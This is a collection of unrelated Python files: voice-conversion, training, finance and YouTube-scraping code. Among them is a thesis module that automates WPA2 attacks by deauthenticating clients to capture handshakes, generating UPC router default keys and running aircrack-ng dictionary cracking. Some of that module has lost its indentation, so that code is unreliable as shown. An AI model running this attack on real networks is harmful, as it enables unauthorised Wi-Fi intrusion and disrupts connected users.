                        help="Location of the pre-trained model to resume training",
                        default=resume_training_at)
    parser.add_argument('--validation_A_dir', type=str,
                        help="validation set for sound source A", default=validation_A_dir_default)
    parser.add_argument('--output_A_dir', type=str,
                        help="output for converted Sound Source A", default=output_A_dir_default)
    parser.add_argument('--validation_B_dir', type=str,
                        help="Validation set for sound source B", default=validation_B_dir_default)
    parser.add_argument('--output_B_dir', type=str,
                        help="Output for converted sound Source B", default=output_B_dir_default)
    argv = parser.parse_args()

    logf0s_normalization = argv.logf0s_normalization
    mcep_normalization = argv.mcep_normalization
    coded_sps_A_norm = argv.coded_sps_A_norm
    coded_sps_B_norm = argv.coded_sps_B_norm
    model_checkpoint = argv.model_checkpoint
    resume_training_at = argv.resume_training_at
    validation_A_dir = argv.validation_A_dir
    output_A_dir = argv.output_A_dir
    validation_B_dir = argv.validation_B_dir
    output_B_dir = argv.output_B_dir

    # Check whether the required cached files exist.
    if not os.path.exists(logf0s_normalization) or not os.path.exists(mcep_normalization):
        print(
            "Cached files do not exist, please run the program preprocess_training.py first")
        # Previously execution continued past this warning and crashed
        # inside np.load() with a confusing traceback; abort cleanly.
        raise SystemExit(1)

    print(torch.cuda.get_device_name())
    cycleGAN = CycleGANTraining(logf0s_normalization=logf0s_normalization,
                                mcep_normalization=mcep_normalization,
                                coded_sps_A_norm=coded_sps_A_norm,
                                coded_sps_B_norm=coded_sps_B_norm,
                                model_checkpoint=model_checkpoint,
                                validation_A_dir=validation_A_dir,
                                output_A_dir=output_A_dir,
                                validation_B_dir=validation_B_dir,
                                output_B_dir=output_B_dir,
                                restart_training_at=resume_training_at)
    cycleGAN.validation_for_A_dir()
    cycleGAN.validation_for_B_dir()
|
# Repository: defNotTrendy/secureLogin
#!/usr/bin/env python3
"""
WPA2 cracking
Automation of MitM Attack on WiFi Networks
Bachelor's Thesis UIFS FIT VUT
<NAME>
2016
#Implementation notes
- Airodump-ng writes its Text User Interface to stderr, stdout is empty.
- Aircrack-ng does not flush when stdout is redirected to file and -q is set.
- Feedback from running subprocesses is obtained from their stdout and stderr. Method Popen.communicate() is
unfortunately not suitable. 'Read data from stdout and stderr, until end-of-file is reached. Wait for process
to terminate.'
Reading of stdout and stderr is done continuously while the subprocess is running. This is achieved by that
the subprocess is writing its stdout and stderr to temporary files. These files are then opened again and continuous
writing and reading is performed. There's only one writer and one reader per file.
- Subprocesses' feedback result is available as an update of process' state, flags and stats. State describes current
position in a lifecycle of the process. Flags can be set or cleared based on events during life of the process.
Flags can be later cleared or set by other parts of the script - after the flag was recognised and appropriate
reaction was performed.
"""
import logging
import os
import pipes
import re
import tempfile
import time
from enum import Enum, unique
from typing import List, TextIO
import pkg_resources
from .model import WirelessAccessPoint, WirelessInterface
from .updatableProcess import UpdatableProcess
from .common import WirelessCapturer, deauthenticate, WifimitmError
__author__ = '<NAME>'
__email__ = '<EMAIL>'
logger = logging.getLogger(__name__)
class Wpa2Error(WifimitmError):
    """Base class for WPA2-cracking errors raised by this module."""
    pass
class PassphraseNotInDictionaryError(Wpa2Error):
    """The passphrase was not found in the currently used dictionary."""
    pass
class PassphraseNotInAnyDictionaryError(Wpa2Error):
    """The passphrase was not found in any of the available dictionaries."""
    pass
class Wpa2Cracker(UpdatableProcess):
"""
"WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys.
So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying
to crack it.
There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack
the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process,
only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static,
so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give
the information to start an attack is the handshake between client and AP."
`cracking_wpa [Aircrack-ng] <http://www.aircrack-ng.org/doku.php?id=cracking_wpa>`_
Although cracking WPA/WPA2 is based on brute force, used dictionary can be personalized by available AP details to
increase the chance of finding the key.
"""
    @unique
    class State(Enum):
        """
        Wpa2Cracker process states.
        """
        # Values are arbitrary unique identifiers, not an ordering.
        CRACKING = 0
        """Cracking or waiting for more IVs."""
        STARTED = 2
        """Process just started."""
        TERMINATED = 100
        """Process have been terminated. By self.stop() call, on its own or by someone else."""
def __init__(self, ap, dictionary):
if not ap.wpa_handshake_cap_path:
raise ValueError
self.state = self.State.STARTED
self.ap = ap
self.dictionary = dictionary
logger.debug("dictionary '{}'".format(str(self.dictionary)))
cmd = ['aircrack-ng',
'-a', '2',
'--bssid', self.ap.bssid,
'-q', # If set, no status information is displayed.
'-w', '-', # dictionary is provided to stdin
'-l', 'psk.ascii', # Write the key into a file.
self.ap.wpa_handshake_cap_path]
# NOTE: Aircrack-ng does not flush when stdout is redirected to file and -q is set.
super().__init__(cmd, stdin=self.dictionary) # start process
def __str__(self):
return '<{!s} state={!s}>'.format(
type(self).__name__, self.state)
def update(self):
"""
Update state of running process from process' feedback.
Read new output from stdout and stderr, check if process is alive.
Aircrack-ng does not flush when stdout is redirected to file and -q is set. Complete stdout is available
in the moment of termination of aircrack-ng.
:raises PassphraseNotInDictionaryError: If passphrase was not found in provided dictionary.
"""
super().update()
# Is process running? State would be changed after reading stdout and stderr.
self.poll()
# check every added line in stdout
if self.stdout_r and not self.stdout_r.closed:
for line in self.stdout_r:
if 'Failed. Next try with' in line:
if self.state != self.State.TERMINATED:
self.state = self.State.CRACKING
if 'KEY FOUND!' in line:
if self.state != self.State.TERMINATED:
self.state = self.State.CRACKING
self.ap.save_psk_file(os.path.join(self.tmp_dir.name, 'psk.ascii'))
logger.debug('Wpa2Cracker found key!')
if 'Passphrase not in dictionary' in line:
logger.debug('Passphrase not in dictionary.')
raise PassphraseNotInDictionaryError()
# check stderr
if self.stderr_r and not self.stderr_r.closed:
for line in self.stderr_r: # type: str
# NOTE: stderr should be empty
logger.warning("Unexpected stderr of 'aircrack-ng': '{}'. {}".format(line, str(self)))
# Change state if process was not running in the time of poll() call in the beginning of this method.
# NOTE: Process' poll() needs to be called in the beginning of this method and returncode checked in the end
# to ensure all feedback (stdout and stderr) is read and states are changed accordingly.
# If the process exited, its state is not changed immediately. All available feedback is read and then
# the state is changed to self.State.TERMINATED. State, flags,stats and others can be changed during reading
# the available feedback even if the process exited. But self.State.TERMINATED is assigned here if
# the process exited.
if self.returncode is not None:
self.state = self.State.TERMINATED
def get_personalized_dictionaries(target: WirelessAccessPoint) -> List[TextIO]:
    """
    Create and return dictionary personalized by available AP details.

    For UPC routers (ESSID matching ``UPC<7 digits>``), candidate WPA2
    passphrases are generated by the external ``upc_keys`` tool and extracted
    with a grep/sed shell pipeline.

    :type target: WirelessAccessPoint
    :param target: targeted AP
    :rtype: List[TextIO]
    :return: list of opened personalized dictionaries
    """
    dictionaries = []
    if re.match(r'^UPC\d{7}$', target.essid):
        # NOTE(review): the `pipes` module is deprecated and removed in
        # Python 3.13; consider migrating to `subprocess`.
        t = pipes.Template()
        t.prepend('upc_keys {} {}'.format(target.essid, '24'), '.-')
        t.append('grep " -> WPA2 phrase for "', '--')
        # Backslashes are doubled so sed receives \S, \(, \) and \1 verbatim;
        # the previous literal relied on Python passing through invalid string
        # escapes, which raises a DeprecationWarning on modern interpreters.
        t.append('sed "s/^ -> WPA2 phrase for \\S* = \'\\(.*\\)\'$/\\1/"', '--')
        d = t.open('dictionary-pipeline', 'r')
        dictionaries.append(d)
    return dictionaries
class Wpa2Attacker(object):
    """
    Main class providing attack on WPA2 secured network.
    """
    def __init__(self, ap, monitoring_interface: WirelessInterface):
        """
        :param ap: targeted AP
        :type monitoring_interface: WirelessInterface
        :param monitoring_interface: wireless interface for attack
        """
        self.ap = ap
        self.monitoring_interface = monitoring_interface  # type: WirelessInterface
    def start(self, force=False):
        """
        Start attack on WPA2 secured network.
        If targeted network have already been cracked and `force` is False, attack is skipped.
        :param force: attack even if network have already been cracked
        :raises PassphraseNotInAnyDictionaryError: If passphrase was not in any available dictionary.
        """
        if not force and self.ap.is_cracked():
            # AP already cracked
            logger.info('Known ' + str(self.ap))
            return
        if not self.ap.wpa_handshake_cap_path:
            # No handshake captured yet: sniff the network and deauthenticate
            # associated stations so they re-connect and produce a handshake.
            with WirelessCapturer(interface=self.monitoring_interface,
                                  ap=self.ap) as capturer:
                while not self.ap.wpa_handshake_cap_path:
                    capturer.update()
                    while not capturer.flags['detected_wpa_handshake']:
                        time.sleep(2)
                        capturer.update()
                        result = capturer.get_capture_result()
                        if len(result):  # if AP was detected by capturer
                            tmp_ap = capturer.get_capture_result()[0]
                            if len(tmp_ap.associated_stations) == 0:
                                logger.info('Network is empty.')
                            # deauthenticate stations to acquire WPA handshake
                            for st in tmp_ap.associated_stations:
                                deauthenticate(self.monitoring_interface, st)
                                time.sleep(2)
                                capturer.update()
                                if capturer.flags['detected_wpa_handshake']:
                                    break
                        else:
                            logger.info('Network not detected by capturer yet.')
                    self.ap.save_wpa_handshake_cap(capturer.wpa_handshake_cap_path)
                    logger.info('WPA handshake detected.')
        # prepare dictionaries
        dictionaries = []
        dictionaries += get_personalized_dictionaries(target=self.ap)  # personalized first
        # NOTE: Dictionary 'openwall_all.lst' has been compiled by Solar Designer
        # of Openwall Project. http://www.openwall.com/wordlists/ License is attached at 'resources/LICENSE'.
        dictionaries.append(pkg_resources.resource_stream(__package__, 'resources/test_dictionary.lst'))
        dictionaries.append(pkg_resources.resource_stream(__package__, 'resources/openwall_password.lst'))
        # Try each dictionary in turn until the AP reports itself cracked.
        for idx, dictionary in enumerate(dictionaries):
            try:
                with Wpa2Cracker(ap=self.ap, dictionary=dictionary)as cracker:
                    while not self.ap.is_cracked():
                        cracker.update()
                        logger.debug(cracker)
                        time.sleep(5)
            except PassphraseNotInDictionaryError:
                logger.info('Passphrase not in dictionary. ({}/{})'.format(idx + 1, len(dictionaries)))
            finally:
                dictionary.close()
            if self.ap.is_cracked():
                logger.info('Cracked ' + str(self.ap))
                break
        else:
            # for/else: runs only when no dictionary succeeded (no break above).
            # Passphrase was not in any dictionary, otherwise the above loop would break.
            logger.error('Passphrase not in any dictionary.')
            raise PassphraseNotInAnyDictionaryError()
        # AP is now cracked, close the dictionaries
        # (dictionaries already tried were closed in the finally clause above;
        # closing a file twice is a harmless no-op).
        for dictionary in dictionaries:
            dictionary.close()
def verify_psk(ap: WirelessAccessPoint, psk: str):
    """
    Check whether `psk` is the passphrase of the given AP.

    A one-line temporary dictionary containing only the candidate passphrase
    is fed to a `Wpa2Cracker`; the verification succeeds iff the cracker
    does not reject it.

    :param ap: targeted AP with a captured WPA handshake
    :param psk: candidate passphrase to verify
    :return: True if the passphrase was confirmed, False otherwise
    """
    with tempfile.NamedTemporaryFile(mode='w', prefix='dictionary') as dictionary_w:
        # Single-entry dictionary holding just the candidate passphrase.
        dictionary_w.write(psk)
        dictionary_w.flush()
        with open(dictionary_w.name, 'r') as dictionary_r:
            with Wpa2Cracker(ap=ap, dictionary=dictionary_r) as cracker:
                try:
                    while not ap.is_cracked():
                        cracker.update()
                        logger.debug(cracker)
                        time.sleep(1)
                    verified = True
                except PassphraseNotInDictionaryError:
                    verified = False
    logger.info('Verified ' + str(ap))
    return verified
|
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
import torch_optimizer as optim
import copy
def checkNoneGradient(model):
    """Print a warning for every trainable parameter that has no gradient.

    Useful after `backward()` to spot parameters that were not reached by
    the loss. Purely diagnostic: prints and returns None.

    Args:
        model: any ``torch.nn.Module``.
    """
    # NOTE: the original file defined this function twice; the second
    # (message-less) copy silently shadowed the first. The two are merged
    # here into a single definition that keeps the explanatory message.
    for name, param in model.named_parameters():
        if param.requires_grad and param.grad is None:
            print("Warning: detected parameter with no gradient that requires gradient:")
            print(param)
            print(param.shape)
            print(name)
def average_gradients(model, c=None, parallel=True):
    """Average (or rescale) the gradients of `model` across workers.

    Args:
        model: ``torch.nn.Module`` whose ``.grad`` fields are updated in place.
        c: divisor applied to every gradient. Defaults to the world size in
            parallel mode and to 1 otherwise.
        parallel: if True, all-reduce (sum) gradients across the initialized
            ``torch.distributed`` process group before dividing.
    """
    # Report parameters that unexpectedly have no gradient.
    checkNoneGradient(model)
    if parallel:
        size = float(dist.get_world_size())
        if c is None:
            c = size
        for param in model.parameters():
            # Skip parameters without a gradient instead of crashing with
            # AttributeError on `param.grad.data` (the original code warned
            # about such parameters above and then dereferenced None anyway).
            if param.requires_grad and param.grad is not None:
                dist.all_reduce(param.grad.data, op=dist.ReduceOp.SUM)
                param.grad.data /= c
    else:
        if c is None:
            c = 1
        for param in model.parameters():
            if param.requires_grad and param.grad is not None:
                param.grad.data /= c
def load_state_dict_tolerant(model, state_dict):
    """Load `state_dict` into `model`, silently skipping incompatible entries.

    Entries whose key is missing from the model, or whose tensor shape does
    not match the model's parameter, are ignored; everything else is loaded.
    """
    current = model.state_dict()
    # Keep only the entries that exist in the model with a matching shape.
    compatible = {
        key: value
        for key, value in state_dict.items()
        if key in current and current[key].shape == value.shape
    }
    current.update(compatible)
    model.load_state_dict(current)
def save_checkpoint(filename, epoch, nIter, model, lossTracker, best_state_dict, optimizer, lrScheduler):
    """Serialize the full training state to `filename` via ``torch.save``.

    Stored keys: 'conf' (model config as a plain dict), 'state_dict',
    'best_state_dict', 'epoch', 'nIter', 'loss_tracker',
    'optimizer_state_dict' and 'lr_scheduler_state_dict'.
    """
    payload = {
        'conf': model.conf.__dict__,
        'state_dict': model.state_dict(),
        'best_state_dict': best_state_dict,
        'epoch': epoch,
        'nIter': nIter,
        'loss_tracker': lossTracker,
        'optimizer_state_dict': optimizer.state_dict(),
        'lr_scheduler_state_dict': lrScheduler.state_dict(),
    }
    torch.save(payload, filename)
def initializeCheckpoint(Model,
                         device,
                         max_lr,
                         weight_decay,
                         nIter,
                         confDict):
    """Build a fresh model, AdaBelief optimizer and OneCycleLR scheduler.

    Args:
        Model: model class exposing a nested ``Config`` class.
        device: torch device the model is moved to.
        max_lr: peak learning rate for optimizer and scheduler.
        weight_decay: optimizer weight decay.
        nIter: total number of scheduler steps.
        confDict: optional dict overriding the default model config.

    Returns:
        (startEpoch, startIter, model, lossTracker, best_state_dict,
        optimizer, lrScheduler) — epoch/iteration counters start at 0.
    """
    conf = Model.Config()
    if confDict is not None:
        conf.__dict__ = confDict
    model = Model(conf).to(device)
    optimizer = optim.AdaBelief(
        model.parameters(),
        max_lr,
        weight_decouple=True,
        eps=1e-12,
        weight_decay=weight_decay,
        rectify=True,
    )
    lrScheduler = torch.optim.lr_scheduler.OneCycleLR(
        optimizer,
        max_lr,
        nIter,
        pct_start=0.2,
        cycle_momentum=False,
        final_div_factor=2,
        div_factor=20,
    )
    lossTracker = {'train': [], 'val': []}
    # Snapshot the initial weights as the current "best" state.
    best_state_dict = copy.deepcopy(model.state_dict())
    return 0, 0, model, lossTracker, best_state_dict, optimizer, lrScheduler
def load_checkpoint(Model, filename, device, strict=False, restart_from_best=False):
    """Restore a training checkpoint produced by `save_checkpoint`.

    Args:
        Model: model class exposing a nested ``Config`` class.
        filename: checkpoint path.
        device: map location / target device.
        strict: if True use ``load_state_dict`` strictly, otherwise fall back
            to the shape-tolerant loader.
        restart_from_best: load 'best_state_dict' instead of the latest
            'state_dict'. Replaces the old hard-coded in-function debugging
            flag (`restartFromTheBest`); the default preserves the previous
            behavior.

    Returns:
        (startEpoch, startIter, model, lossTracker, best_state_dict,
        optimizer, lrScheduler)
    """
    checkpoint = torch.load(filename, map_location=device)
    startEpoch = checkpoint['epoch']
    startIter = checkpoint['nIter']
    conf = Model.Config()
    conf.__dict__ = checkpoint['conf']
    model = Model(conf=conf).to(device)
    # The hyper-parameters below are placeholders only: both objects are
    # overwritten by the state dicts loaded further down.
    optimizer = optim.AdaBelief(
        model.parameters(),
        2e-4,
        weight_decouple=True,
        eps=1e-12,
        weight_decay=1e-4,
        rectify=True)
    lrScheduler = torch.optim.lr_scheduler.OneCycleLR(
        optimizer, 6e-4, 180000, pct_start=0.2, cycle_momentum=False,
        final_div_factor=2, div_factor=20)
    state_key = 'best_state_dict' if restart_from_best else 'state_dict'
    if strict:
        model.load_state_dict(checkpoint[state_key])
    else:
        load_state_dict_tolerant(model, checkpoint[state_key])
    optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
    lrScheduler.load_state_dict(checkpoint['lr_scheduler_state_dict'])
    best_state_dict = checkpoint['best_state_dict']
    lossTracker = checkpoint['loss_tracker']
    return startEpoch, startIter, model, lossTracker, best_state_dict, optimizer, lrScheduler
def computeMetrics(model, x, notes):
    """Evaluate one batch: mean log-probability plus MIREVAL note counts.

    Args:
        model: object providing ``log_prob(x, notes)`` and
            ``computeStatsMIREVAL(x, notes)``.
        x: input tensor; ``x.shape[1]`` is reported as the segment length.
        notes: ground-truth notes passed through to the model.

    Returns:
        dict with keys 'logProb', 'length', 'nGT', 'nEst', 'nCorrect'.
    """
    with torch.no_grad():
        log_probs = model.log_prob(x, notes)
        mean_logp = log_probs.sum(-1).mean().item()
        stats = model.computeStatsMIREVAL(x, notes)
    return {
        "logProb": mean_logp,
        "length": x.shape[1],
        "nGT": stats["nGT"],
        "nEst": stats["nEst"],
        "nCorrect": stats["nCorrect"],
    }
def doValidation(model, dataset, parallel, device):
    """Run validation over `dataset` and aggregate note-tracking metrics.

    Args:
        model: model evaluated via `computeMetrics`; must expose ``fs``
            (sample rate used to convert lengths to seconds).
        dataset: iterable of batches; each batch is a list of samples with
            'notes' and 'audioSlice' (numpy) entries.
        parallel: if True, all-reduce the aggregated counts across the
            initialized ``torch.distributed`` process group (CUDA tensors).
        device: device the stacked audio slices are moved to.

    Returns:
        dict with 'meanNLL' (per second), 'precision', 'recall' and 'f1'.
    """
    resultAll = []
    with torch.no_grad():
        for idx, batch in enumerate(dataset):
            notesBatch = [sample["notes"] for sample in batch]
            audioSlices = torch.stack(
                [torch.from_numpy(sample["audioSlice"]) for sample in batch], dim=0).to(device)
            result = computeMetrics(model, audioSlices, notesBatch)
            resultAll.append(result)
            print(result, "progress:{:0.2f}".format(idx / len(dataset)))
    # aggregate the result (assumes dataset is non-empty)
    logPAgg = sum(e["logProb"] for e in resultAll)
    lengthAgg = sum(e["length"] / model.fs for e in resultAll)
    nGT = sum(e["nGT"] for e in resultAll)
    nEst = sum(e["nEst"] for e in resultAll)
    nCorrect = sum(e["nCorrect"] for e in resultAll)
    if parallel:
        import torch.distributed as dist
        agg = torch.Tensor([logPAgg, lengthAgg, nGT, nEst, nCorrect]).cuda()
        dist.all_reduce(agg.data)
        logPAgg = float(agg[0])
        lengthAgg = float(agg[1])
        nGT = float(agg[2])
        nEst = float(agg[3])
        nCorrect = float(agg[4])
    meanNLLPerSecond = -logPAgg / lengthAgg
    # Guard the ratios against zero denominators (no estimated or no ground
    # truth notes); the original code raised ZeroDivisionError in that case.
    precision = nCorrect / nEst if nEst else 0.0
    recall = nCorrect / nGT if nGT else 0.0
    f1 = 2 * precision * recall / (precision + recall) if (precision + recall) else 0.0
    return {"meanNLL": meanNLLPerSecond, "precision": precision, "recall": recall, "f1": f1}
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.1.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # s_hidden_markov_model_stocks [<img src="https://www.arpm.co/lab/icons/icon_permalink.png" width=30 height=30 style="display: inline;">](https://www.arpm.co/lab/redirect.php?code=s_hidden_markov_model_stocks&codeLang=Python)
# For details, see [here](https://www.arpm.co/lab/redirect.php?permalink=ExerFigHMM).
# +
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from hmmlearn.hmm import GaussianHMM
from arpym.tools import add_logo
# -
# ## [Input parameters](https://www.arpm.co/lab/redirect.php?permalink=s_hidden_markov_model_stocks-parameters)
name = 'CSCO'  # name of company to consider
t_first = '2007-09-10'  # starting date
t_last = '2012-10-19'  # ending date
# ## [Step 0](https://www.arpm.co/lab/redirect.php?permalink=s_hidden_markov_model_stocks-implementation-step00): Load data
path = '../../../databases/global-databases/equities/db_stocks_SP500/'
df_stocks = pd.read_csv(path + 'db_stocks_sp.csv', skiprows=[0], index_col=0)
df_stocks = df_stocks.set_index(pd.to_datetime(df_stocks.index))
# ## [Step 1](https://www.arpm.co/lab/redirect.php?permalink=s_hidden_markov_model_stocks-implementation-step01): Compute the compounded returns
v = df_stocks[name].loc[(df_stocks.index >= t_first) &
                        (df_stocks.index <= t_last)]
dx = np.diff(np.log(v))
dx[np.isnan(dx)] = 0  # replace NaNs (missing prices) with zero returns
# ## [Step 2](https://www.arpm.co/lab/redirect.php?permalink=s_hidden_markov_model_stocks-implementation-step02): Fit the hidden Markov model and get the transition matrix
# +
# means_prior=0 with a huge means_weight pins the state means near zero, so
# the two states differ essentially by their volatility.
hmm = GaussianHMM(n_components=2, means_prior=np.zeros((1, 1)),
                  means_weight=1e10).fit(dx.reshape(-1, 1))
# rearrange the volatility from small to large
sigma2 = hmm.covars_.flatten()
idx = np.argsort(sigma2)
sigma2 = sigma2[idx]
p = hmm.transmat_[np.ix_(idx, idx)]  # transition matrix
# -
# ## [Step 3](https://www.arpm.co/lab/redirect.php?permalink=s_hidden_markov_model_stocks-implementation-step03): Compute the hidden status
# relabel the decoded states so that 0 = low-volatility (calm), 1 = panic
z_ = hmm.predict(dx.reshape(-1, 1))
z = z_.copy()
z[z_ == 0] = idx[0]
z[z_ == 1] = idx[1]
# ## Plots
# +
plt.style.use('arpm')
panic = dx.copy()
calm = dx.copy()
panic[z == 0] = np.nan
calm[z == 1] = np.nan
fig = plt.figure()
plt.plot(v.index[1:], calm, '.', color=[0.4, 0.4, 0.4])
plt.plot(v.index[1:], panic, '^', color=[1.0, 0.5, 0.0])
plt.legend(['state=calm', 'state=panic'])
plt.ylabel('compound returns')
add_logo(fig)
|
# Repository: aktivkohle/youtube-curation
import sys
from userInteraction import askTheUser
import requests
import config
import dateutil.parser
import dateutil.parser
import datetime
from dateutil.relativedelta import relativedelta
import time
import pprint
import pymysql.cursors
import re
def printUnixTimestampNicely(Tstamp):
return (datetime.datetime.fromtimestamp(Tstamp).strftime("%d %B %Y %I:%M:%S %p"))
# One log file per run, named after the start time; it stays open for the
# whole script and is closed at the very end.
# NOTE(review): the generated name contains ':' characters, which are not
# valid in filenames on Windows — confirm this only runs on POSIX systems.
logfileName = datetime.datetime.now().strftime("%d%B%Y%I:%M:%S%p") + '_Logfile.txt'
f = open("./logfiles/" + logfileName, 'w')
def printDateNicely(timestamp):
    """Print a datetime as e.g. '05 March 2018 07:45:10 PM'."""
    print(timestamp.strftime("%d %B %Y %I:%M:%S %p"))
def wr(message, p, fi):
    """Append `message` plus a pretty-printed copy of payload dict `p` to log file `fi`.

    The 'key' entry (the Google API key) is replaced with the literal string
    'googleAPIkey' so the real secret never reaches the log.
    """
    fi.write(str(message))
    fi.write('\n')
    redacted = dict(p)  # copy so the caller's payload stays untouched
    redacted['key'] = 'googleAPIkey'
    pprint.pprint(redacted, fi)
    fi.write('\n')
# Matches timestamps that already end in '.mmmZ' (millisecond precision).
# Compiled once at module level instead of on every call.
_MS_SUFFIX_RE = re.compile(r".*[.]\d{3}Z$")

def zed(ts):
    """Normalize a timestamp string to end in '.000Z' millisecond form.

    - already ends in '.dddZ' -> returned unchanged
    - ends in 'Z'            -> 'Z' replaced by '.000Z'
    - otherwise              -> '.000Z' appended
    """
    if _MS_SUFFIX_RE.match(ts) is not None:
        return ts
    if ts.endswith('Z'):
        return ts[:-1] + '.000Z'
    return ts + '.000Z'
def storeMeInSQL(element, qq, SQLconnection, openlogfileHandle):
    """Persist every item of a YouTube search API response into the search_api table.

    Args:
        element: decoded JSON response of the search.list endpoint.
        qq: the query string ('query_q') the response was produced for.
        SQLconnection: open PyMySQL connection.
        openlogfileHandle: open log file for duplicate notices.

    Side effects: inserts rows, commits, and increments the global `counter`
    once per successful insert.
    """
    # Although query_q has scope outside this function, it is safer to actually pass it in as an
    # argument, as it is very important, one day this function might not be in this program anymore
    # and that saves us from running into a problem.
    global counter
    queriedAt = printUnixTimestampNicely(time.time())
    kind = element['kind']
    etag = element['etag']
    regionCode = element['regionCode']
    for thing in list(element['items']):
        videoTitle = thing['snippet']['title']
        channelTitle = thing['snippet']['channelTitle']
        videoId = thing['id']['videoId']
        description = thing['snippet']['description']
        published_raw = thing['snippet']['publishedAt']
        published_dt = dateutil.parser.parse(published_raw).replace(tzinfo=None)
        publishedAt = published_dt.strftime('%Y-%m-%d %H:%M:%S')
        items_etag = thing['etag']
        channelId = thing['snippet']['channelId']
        # Duplicate check: look the videoId up directly instead of fetching
        # every distinct videoId for every item (the original approach scanned
        # the whole table once per item, O(table size) per insert).
        with SQLconnection.cursor() as c1:
            c1.execute("SELECT 1 FROM search_api WHERE videoId = %s LIMIT 1", (videoId,))
            already_stored = c1.fetchone() is not None
        if not already_stored:
            with SQLconnection.cursor() as c2:
                sql2 = "INSERT INTO search_api (videoTitle, channelTitle, videoId, description, publishedAt, queriedAt, kind, etag, regionCode, items_etag, channelId, query_q) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"
                c2.execute(sql2, (videoTitle, channelTitle, videoId, description, publishedAt, queriedAt, kind, etag, regionCode, items_etag, channelId, qq))
            SQLconnection.commit()
            # 'counter' is a global; incremented exactly once per committed insert.
            counter += 1
        else:
            openlogfileHandle.write("Avoided saving a duplicate into SQL!" + " - " + videoId)
            openlogfileHandle.write("\n")
# --- main script ----------------------------------------------------------
# Ask the user for the date range and query term; abort if the dialog was
# cancelled (askTheUser returned None).
v = askTheUser()
if v == None:
    sys.exit()
begin_string = v[0]
end_of_month_string = v[1]
query_q = v[2]
# Single MySQL connection reused for the whole run; closed at the end.
connection = pymysql.connect(host='localhost',
                             user='root',
                             password=config.MYSQL_SERVER_PASSWORD,
                             db='youtubeProjectDB',
                             charset='utf8mb4', # deals with the exotic emojis
                             cursorclass=pymysql.cursors.DictCursor)
print ("\n\n")
printDateNicely(datetime.datetime.now())
# Base parameters for the YouTube Data API v3 search.list endpoint; the
# publishedAfter/publishedBefore window is filled in per day inside the loop.
payload = {'key': config.GOOGLE_API_KEY,
           'part': 'snippet',
           'q': query_q, # 'dog+training'
           'order' : 'date', # reverse chronological of creation
           'type':'video',
           'videoCaption':'closedCaption', # includes captions.
           'maxResults':50}
# videoCaption string
# The videoCaption parameter indicates whether the API should filter video search results based on
# whether they have captions. If you specify a value for this parameter,
# you must also set the type parameter's value to video
# Acceptable values are:
#  any – Do not filter results based on caption availability.
#  closedCaption – Only include videos that have captions.
#  none – Only include videos that do not have captions.
# complete documentation here: https://developers.google.com/youtube/v3/docs/search/list
counter = 0  # total SQL insert operations; incremented inside storeMeInSQL
#begin_string = '2017-02-01T00:00:00Z'
end_datetime = dateutil.parser.parse(begin_string).replace(tzinfo=None)
#end_of_month_string = '2017-03-01T00:00:00Z'
end_of_month_datetime = dateutil.parser.parse(end_of_month_string).replace(tzinfo=None)
# Walk the requested interval one day at a time; for each day, fetch the
# first result page and then any additional pages via nextPageToken.
while end_datetime < end_of_month_datetime:
    bs = begin_string # to get it out of the loop
    begin_datetime = dateutil.parser.parse(begin_string).replace(tzinfo=None)
    end_datetime = begin_datetime + relativedelta(days=1)
    end_string = end_datetime.isoformat()
    es = end_string # to get it out of the loop
    print ("\n")
    begin_datetime = end_datetime
    begin_string = begin_datetime.isoformat()
    print ("begin: ", zed(bs))
    print ("end: ", zed(es))
    f.write("\n")
    f.write("begin: " + zed(bs))
    f.write("\n")
    f.write("end: " + zed(es))
    f.write("\n")
    # restrict this request to the current one-day window
    payload.update({'publishedAfter' : zed(bs)})
    payload.update({'publishedBefore': zed(es)})
    wr(1, payload, f)
    r = requests.get('https://www.googleapis.com/youtube/v3/search', params=payload)
    time.sleep( 1/5 )  # crude rate limiting between API calls
    statuscode = r.status_code
    # We have been retrieving for each day
    # ..however where a day contains multiple pages
    # it is necessary to have another loop of sorts
    # here which retrieves those pages within the one
    # day
    # more queries for the special case of multiple pages
    # within one day
    if statuscode == 200:
        time.sleep( 1/5 )
        objects = r.json()
        if 'nextPageToken' not in list(objects):
            print ("NormalLengthDay")
            storeMeInSQL(objects, query_q, connection, f)
            daycount = 1
        elif 'nextPageToken' in list(objects):
            storeMeInSQL(objects, query_q, connection, f)
            daycount = 1
            itemsEmpty = 0  # consecutive empty pages; bail out after 3
            while 'nextPageToken' in list(objects):
                NPT = objects['nextPageToken']
                payload.update({'pageToken': NPT})
                time.sleep( 1/5 )
                wr(2, payload, f)
                r = requests.get('https://www.googleapis.com/youtube/v3/search', params=payload)
                time.sleep( 1/5 )
                statuscode = r.status_code
                if statuscode == 200:
                    time.sleep( 1/5 )
                    objects = r.json()
                    storeMeInSQL(objects, query_q, connection, f)
                    daycount += 1
                else:
                    print (bs, statuscode)
                    time.sleep( 1/5 )
                    wr(3, payload, f)
                if len(objects['items']) == 0:
                    itemsEmpty += 1
                    if itemsEmpty > 3:
                        break
            payload.pop('pageToken')
            # important! - now that this section is finished clean out that key from the dictionary!!!
            wr(4, payload, f)
            print(daycount, " pages of results today.")
            f.write(str(daycount) + " pages of results today.")
            wr(5, payload, f)
    else:
        print ("statuscode : ", statuscode)
        time.sleep( 1/5 )
print ('\n')
printDateNicely(datetime.datetime.now())
print (counter, " SQL-store operations in total.")
f.close()
connection.close()
|
# Copyright 2017 AT&T Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
